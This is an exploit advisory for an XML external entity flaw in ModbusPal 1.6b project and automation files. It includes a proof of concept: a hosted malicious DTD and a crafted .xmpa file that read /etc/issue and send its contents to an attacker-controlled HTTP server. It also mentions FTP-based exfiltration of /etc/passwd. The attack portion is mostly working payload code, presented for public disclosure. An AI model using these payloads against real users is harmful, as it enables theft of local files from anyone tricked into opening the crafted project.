Modbuspal 1.6b xml external entity injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-05-10 |
Type : webapps |
Platform : java
This exploit / vulnerability Modbuspal 1.6b xml external entity injection is for educational purposes only and if it is used you will do on your own risk!
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
2. Proof of Concept
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
b.) Contents of hosted "evil.xml"
<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
c.) Example Exploited "xxe.xmpa"
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.